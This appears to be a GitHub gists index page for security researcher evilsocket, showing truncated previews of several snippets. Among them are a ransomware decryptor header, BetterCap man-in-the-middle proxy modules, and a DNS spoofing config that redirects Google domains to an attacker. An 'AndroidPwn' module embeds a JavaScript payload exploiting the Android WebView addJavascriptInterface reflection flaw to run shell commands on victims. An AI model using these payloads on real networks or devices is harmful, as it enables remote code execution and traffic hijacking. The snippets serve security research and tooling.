I hereby claim:
- I am evilsocket on github.
- I am evilsocket (https://keybase.io/evilsocket) on keybase.
- I have a public key ASDQOex7WfTVV8cumbapyzHyv-NXXay_D0-RfJwOH8xKrQo
To claim this, I am signing this object:
/* | |
* This tool will decrypt files encrypted by the Magniber ransomware with | |
* AES128 ( CBC mode ) algorithm. | |
* | |
* RE and report by MalwareBytes ( @hasherezade ) | |
* | |
* https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/ | |
* | |
* Decryptor written by Simone 'evilsocket' Margaritelli | |
* |
package main | |
import ( | |
"encoding/json" | |
"fmt" | |
"io/ioutil" | |
"math/rand" | |
"net/http" | |
"net/url" | |
"strings" |
class Example < BetterCap::Proxy::TCP::Module | |
meta( | |
'Name' => 'Example', | |
'Description' => 'Example TCP proxy module.', | |
'Version' => '1.0.0', | |
'Author' => "Simone 'evilsocket' Margaritelli", | |
'License' => 'GPL3' | |
) | |
# Received when the victim is sending data to the upstream server. |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
# | |
# Periodically scan your network searching for your | |
# Raspberry Pi board and update your /etc/hosts file | |
# with its ip address. | |
# | |
# Copyleft by Simone 'evilsocket' Margaritelli | |
# http://www.evilsocket.net | |
# evilsocket at gmail dot com | |
# |
class AndroidPwn < BetterCap::Proxy::Module | |
@@command = nil | |
@@payload = "<script>\n" + | |
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" + | |
"for(i in top) {\n" + | |
" try {\n" + | |
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" + | |
" break;\n" + | |
" }\n" + | |
"catch(e) {}\n" + |
# Empty lines or lines starting with # will be ignored. | |
# redirect *.google.com to the attacker ip address | |
local .*google\.com | |
# redirect *.microsoft.com to 10.10.10.10 | |
10.10.10.10 .*microsoft\.com |
class HackTitle < BetterCap::Proxy::HTTP::Module | |
meta( | |
'Name' => 'HackTitle', | |
'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.', | |
'Version' => '1.0.0', | |
'Author' => "Simone 'evilsocket' Margaritelli", | |
'License' => 'GPL3' | |
) | |
# called before the request is performed |
public class WebViewGUI extends Activity { | |
WebView mWebView; | |
public void onCreate(Bundle savedInstanceState) { | |
super.onCreate(savedInstanceState); | |
mWebView=new WebView(this); | |
mWebView.getSettings().setJavaScriptEnabled(true); | |
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface"); | |
mWebView.loadUrl("file:///android_asset/www/index.html"); | |
setContentView(mWebView); | |
} |
I hereby claim:
To claim this, I am signing this object: